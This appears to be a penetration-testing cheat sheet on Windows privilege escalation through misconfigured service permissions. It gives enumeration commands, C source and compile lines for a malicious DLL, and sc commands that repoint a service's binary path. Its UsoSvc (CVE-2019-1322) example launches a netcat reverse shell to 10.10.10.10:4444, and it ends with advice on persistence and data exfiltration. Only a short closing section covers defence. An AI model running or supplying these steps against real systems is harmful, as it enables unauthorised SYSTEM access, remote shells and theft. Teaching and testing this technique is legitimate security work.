EoP - Incorrect permissions in services

Key Concepts

1. Service Permissions

• Writable services: Only trusted users should have write permissions.

• Service path vulnerabilities: Writable paths may allow DLL hijacking or binary replacement.

2. Common Vulnerabilities

• Orphaned installs: Services with missing or unmaintained binaries.

• DLL hijacking: Services load malicious DLLs from writable locations.

• Weak PATH permissions: Writable PATH directories allow privilege escalation.

---

Step-by-Step Guide to Identifying and Exploiting Vulnerable Services

1. Checking File Permissions

Use the icacls command to inspect service binary permissions:

icacls "C:\path\to\service\binary.exe"

Look for vulnerable permissions like:

• BUILTIN\Users:(F) - Full access

• BUILTIN\Users:(M) - Modify access

• BUILTIN\Users:(W) - Write access

Example:

icacls "C:\Windows\System32\example_service.exe"

Output:

example_service.exe BUILTIN\Administrators:(I)(F)
                    NT AUTHORITY\SYSTEM:(I)(F)
                    BUILTIN\Users:(I)(M)

---

2. Finding Vulnerable Services

List services with their executable paths:

wmic service list full | findstr /i "path"

Inspect individual service configurations:

for /f "tokens=2" %a in ('wmic service get name^, displayname^, pathname') do @sc qc %a | findstr "BINARY_PATH_NAME"

---

3. Identifying Potential DLL Hijacking

Using PowerUp to find DLL hijacking paths:

Import-Module PowerUp.ps1
Find-PathDLLHijack

Using Process Monitor (ProcMon):

• Filter for NAME NOT FOUND entries during service startup to identify missing DLLs.

---

4. Compiling a Malicious DLL

Create a DLL to execute commands upon injection. Use the following sample code:

C Code for Malicious DLL:

#include <windows.h>
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) {
    if (fdwReason == DLL_PROCESS_ATTACH) {
        system("cmd.exe /k whoami > C:\\Windows\\Temp\\dll.txt");
        ExitProcess(0);
    }
    return TRUE;
}

Compile the DLL:

• For x64:

  x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll

• For x86:

  i686-w64-mingw32-gcc windows_dll.c -shared -o output.dll

---

5. Exploiting the Vulnerability

1. Stop the Service:

   sc stop <ServiceName>

2. Modify the Service Binary Path:

   sc config <ServiceName> binPath= "C:\path\to\your\malicious.dll"

3. Start the Service:

   sc start <ServiceName>

---

Example: Exploiting UsoSvc (CVE-2019-1322)

1. Stop the Service:

   sc stop UsoSvc

2. Modify Binary Path to Execute Payload:

   sc config UsoSvc binPath= "C:\Windows\System32\spool\drivers\color\nc.exe 10.10.10.10 4444 -e cmd.exe"

3. Start the Service:

   sc start UsoSvc

---

6. Post-Exploitation

After gaining elevated privileges:

• Maintain access: Establish persistence (e.g., backdoor or scheduled tasks).

• Further exploitation: Explore lateral movement or sensitive data exfiltration.

---

Tools for Service Permission Analysis

Accesschk (Sysinternals)

Analyze permissions on a specific service:

accesschk.exe -uwcqv <ServiceName>

Metasploit Module

Automate the process using Metasploit:

exploit/windows/local/service_permissions

---

Security Considerations

• Monitor permissions on critical services and binaries.

• Restrict write access to trusted users.

• Regularly audit PATH directories for inappropriate permissions.